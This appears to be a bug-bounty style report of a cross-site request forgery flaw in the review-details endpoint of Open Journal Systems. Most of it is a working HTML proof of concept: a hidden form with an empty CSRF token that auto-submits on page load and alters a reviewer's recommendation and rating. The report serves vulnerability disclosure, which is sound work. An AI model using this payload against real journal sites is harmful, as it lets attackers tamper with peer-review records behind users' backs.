Description
CSRF in Review Details
Proof of Concept
1 . Attacker send form fake to user
<html>
<body>
<form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-
journal/$$$call$$$/grid/users/reviewer/reviewer-grid/review-read">
<input type="hidden" name="csrfToken" value="" />
<input type="hidden" name="reviewAssignmentId" value="12" />
<input type="hidden" name="submissionId" value="697" />
<input type="hidden" name="stageId" value="3" />
<input type="hidden" name="recommendation" value="2" />
<input type="hidden" name="quality" value="2" />
<input type="hidden" name="submitFormButton" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 .User click, changed unwanted Recommendation and Reviewer rating changes
Video Poc
https://drive.google.com/file/d/1jUapGuHL1vR173QqXCdTGxybLXgbG99M/view?usp=sharing
Payload Poc
https://drive.google.com/file/d/11Xob6yqU12MEpK1aJVWRIJi5-3aduVu5/view?usp=sharing